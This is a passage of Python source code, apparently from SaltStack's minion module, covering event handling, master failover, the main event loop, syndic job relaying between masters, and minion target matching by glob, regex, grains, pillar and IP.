self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
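# Illustrative event data (keys taken from the lookups below; values are
# assumptions):
#
#   {'environ': {'FOO': 'bar', 'OLD_VAR': False},
#    'false_unsets': True,
#    'clear_all': False}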
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
logging.DEBUG if salt.utils.is_windows() else logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
# pillar_refresh is a coroutine; yield it so the refresh actually completes
yield self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
# forward the schedule return to the master
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not my master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when my failback master is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master']:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
salt.crypt.AsyncAuth.creds_map[key] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering-enabled case, we'd like to know when the minion sees something it shouldn't
log.trace('Broadcast message received not for this minion, Load: {0}'.format(payload['load']))
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
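# Illustrative publication load that would pass both checks (values are
# assumptions):
#
#   {'tgt': 'web*', 'tgt_type': 'glob', 'jid': '20230101000000000000',
#    'fun': 'test.ping', 'arg': []}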
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: {0}'.format(args[1]))
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus, assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def _return_pub_multi(self, values):
for value in values:
yield self._return_pub(value,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
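# Illustrative master-side configuration for the two modes described above
# (values are examples only, not taken from this module):
#     syndic_mode: sync      # forward all events and publishes downstream
#     syndic_mode: cluster   # forward only job publishes and returns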
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic; best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level master -- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
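# Illustrative call (values are examples, not from this codebase): a top file
# entry such as
#   base:
#     'os:Debian':
#       - match: grain
#       - webserver
# reaches this method as confirm_top('os:Debian', [{'match': 'grain'}, 'webserver']).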
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
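# Illustrative behaviour (addresses are examples): ipcidr_match('10.0.0.5')
# matches a minion whose ipv4 grain contains that exact address, while
# ipcidr_match('10.0.0.0/24') matches any minion with an ipv4 grain inside
# that subnet.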
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
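# Illustrative compound target (identifiers are examples only):
#   'webserv* and G@os:Debian or E@web-dc[12]-.*'
# which globs on the minion id, checks the 'os' grain, or PCRE-matches the id.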
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
